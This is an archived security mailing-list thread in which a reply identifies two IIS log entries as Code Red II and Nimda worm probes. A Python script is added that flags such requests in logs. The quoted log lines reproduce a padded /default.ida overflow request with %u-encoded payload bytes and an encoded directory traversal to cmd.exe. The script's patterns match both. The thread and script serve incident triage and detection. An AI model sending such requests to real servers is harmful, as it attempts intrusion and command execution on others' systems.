Security Basics mailing list archives

RE: Suspicious IIS Log entry


From: "Paul Kurczaba" <paul () myipis com>
Date: Tue, 9 Sep 2003 16:10:57 -0400

The first entry is the Code Red II Worm:

http://www.cert.org/incident_notes/IN-2001-09.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/virus/newred.asp

The second entry is the Nimda Worm:

http://www.cert.org/advisories/CA-2001-26.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/virus/nimda.asp

-Paul Kurczaba

-----Original Message-----
From: Toby Schau [mailto:Toby.Schau () iacudiv state ia us]
Sent: Tuesday, September 09, 2003 12:43 PM
To: 'Security-Basics () Securityfocus com'
Subject: Suspicious IIS Log entry


I found the following suspicious entries in my IIS log files. Does anyone
recognize the specific vulnerabilities that are attempted to be exploited?

[ex030809.log (20)] : 2003-08-09 05:14:10 xxx.xx.xx.xx- xx.xx.xx.xx 80 GET
/default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u
90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090
%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -

[ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx - xxx.xx.xxx.xx 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe 404 -

Thanks
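One way to triage entries like the two quoted in this thread, added here as an example and not written by either poster: a small classifier that flags the padded /default.ida request and the multiply-encoded traversal to cmd.exe. The sample lines are constructed in the shape of the quoted entries (documentation-range addresses, shortened %u sequence), and the function names and labels are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the entries quoted in the thread.
SAMPLE_LOG = [
    "2003-08-09 05:14:10 192.0.2.10 - 198.51.100.5 80 GET /default.ida "
    + "X" * 224 + "%u9090%u6858%ucbd3%u7801 404 -",
    "2003-09-08 06:31:02 192.0.2.77 - 198.51.100.5 80 GET "
    "/<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe 404 -",
    "2003-09-08 06:32:40 192.0.2.80 - 198.51.100.5 80 GET /index.html - 200 -",
]

PAD_RUN = re.compile(r"([A-Za-z])\1{99,}")   # 100+ repeats of a single letter
PCT_U = re.compile(r"%u[0-9a-fA-F]{4}")      # IIS-style %uXXXX encoding

def fully_decode(text, max_rounds=5):
    """Percent-decode until stable; return (decoded, rounds that changed it)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

def classify(line):
    """Return a label for the two probe shapes seen in the thread, else None."""
    low = line.lower()
    # Shape 1: request to the .ida handler with long padding or %u sequences.
    if "/default.ida" in low and (PAD_RUN.search(line) or PCT_U.search(line)):
        return "ida-overflow-probe"
    # Shape 2: directory traversal to cmd.exe, possibly hidden by nested encoding.
    decoded, rounds = fully_decode(low)
    path = decoded.replace("\\", "/")
    if "../" in path and "cmd.exe" in path:
        prefix = "multi-encoded-" if rounds > 1 else ""
        return prefix + "traversal-to-cmd.exe"
    return None

def scan(lines):
    """Return (index, label) for every line that matches a probe shape."""
    hits = []
    for i, line in enumerate(lines):
        label = classify(line)
        if label:
            hits.append((i, label))
    return hits

if __name__ == "__main__":
    for index, label in scan(SAMPLE_LOG):
        print(index, label)
```

Both requests in the thread were answered with 404, so hits like these record probes that the server rejected; the status field is what separates that from a request that was served.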

